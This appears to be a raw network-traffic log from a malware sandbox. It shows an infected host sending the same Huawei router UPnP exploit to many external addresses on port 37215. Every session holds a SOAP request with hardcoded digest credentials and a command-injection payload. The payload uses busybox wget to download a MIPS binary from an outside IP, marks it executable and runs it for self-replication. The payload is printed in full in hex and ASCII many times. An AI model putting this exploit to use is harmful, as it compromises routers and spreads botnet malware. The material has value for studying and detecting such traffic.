2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1006192.168.2.1551822157.239.116.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697372913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1007192.168.2.155933841.205.84.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697401047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1008192.168.2.1551120197.71.0.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697833061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1009192.168.2.1560340197.221.111.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697865963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1010192.168.2.1539158192.120.59.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.697894096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1011192.168.2.1545190197.136.5.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.703753948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1012192.168.2.153443641.46.206.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.704437017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1013192.168.2.1544048197.205.129.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.704948902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1014192.168.2.155922841.158.148.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.704974890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1015192.168.2.155371841.127.44.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.705013037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1016192.168.2.1557432213.97.29.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:57.705121994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
